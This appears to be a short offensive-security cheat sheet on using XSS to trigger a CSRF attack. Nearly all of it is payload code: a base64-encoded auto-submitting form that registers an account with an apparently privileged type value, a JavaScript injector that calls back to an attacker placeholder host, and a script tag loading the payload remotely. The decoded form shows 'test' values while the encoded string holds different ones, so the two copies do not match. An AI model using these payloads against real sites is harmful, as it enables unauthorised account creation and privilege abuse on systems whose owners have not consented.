Cross-Site Request Forgery (CSRF)

CSRF called by an XSS

Form

echo "PGh0bWw+Cjxib2R5IG9ubG9hZD0iZG9jdW1lbnQuZm9ybXNbJ3B3biddLnN1Ym1pdCgpIj4KPGZvcm0gbWV0aG9kPSJQT1NUIiBhY3Rpb249Ii9sb2dpbkxvZ291dCIgYWNjZXB0LWNoYXJzZXQ9IlVURi04IiBuYW1lPSJwd24iIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJ1c2VybmFtZSIgdmFsdWU9Im9mZnNlYyIvPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJwYXNzd29yZCIgdmFsdWU9Im9mZnNlYyIvPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJmaXJzdE5hbWUiIHZhbHVlPSJvZmZzZWMiLz4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0ibGFzdE5hbWUiIHZhbHVlPSJvZmZzZWMiLz4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZW1haWwiIHZhbHVlPSJvZmZzZWNAb2Zmc2VjdGVzdC5sb2NhbCIvPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJ0eXBlIiB2YWx1ZT0iMTAwIi8+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImRUeXBlIiB2YWx1ZT0iaXNSZWdpc3RlciIvPgo8L2Zvcm0+CjwvYm9keT4KPC9odG1sPgo=" | base64 -d
<html>
<body onload="document.forms['pwn'].submit()">
<form method="POST" action="/loginLogout" accept-charset="UTF-8" name="pwn" enctype="multipart/form-data">
<input type="hidden" name="username" value="test"/>
<input type="hidden" name="password" value="test"/>
<input type="hidden" name="firstName" value="test"/>
<input type="hidden" name="lastName" value="test"/>
<input type="hidden" name="email" value="test@test.com"/>
<input type="hidden" name="type" value="100"/>
<input type="hidden" name="dType" value="isRegister"/>
</form>
</body>
</html>

JS script

let d="PGh0bWw+Cjxib2R5IG9ubG9hZD0iZG9jdW1lbnQuZm9ybXNbJ3B3biddLnN1Ym1pdCgpIj4KPGZvcm0gbWV0aG9kPSJQT1NUIiBhY3Rpb249Ii9sb2dpbkxvZ291dCIgYWNjZXB0LWNoYXJzZXQ9IlVURi04IiBuYW1lPSJwd24iIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJ1c2VybmFtZSIgdmFsdWU9Im9mZnNlYyIvPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJwYXNzd29yZCIgdmFsdWU9Im9mZnNlYyIvPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJmaXJzdE5hbWUiIHZhbHVlPSJvZmZzZWMiLz4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0ibGFzdE5hbWUiIHZhbHVlPSJvZmZzZWMiLz4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZW1haWwiIHZhbHVlPSJvZmZzZWNAb2Zmc2VjdGVzdC5sb2NhbCIvPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJ0eXBlIiB2YWx1ZT0iMTAwIi8+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImRUeXBlIiB2YWx1ZT0iaXNSZWdpc3RlciIvPgo8L2Zvcm0+CjwvYm9keT4KPC9odG1sPgo="
document.getElementsByTagName("html")[0].innerHTML = atob(d);
fetch("http://<your-ip>/exfil?DONE")

XSS call

<script src="http://<your-ip>/xss_script.js"></script>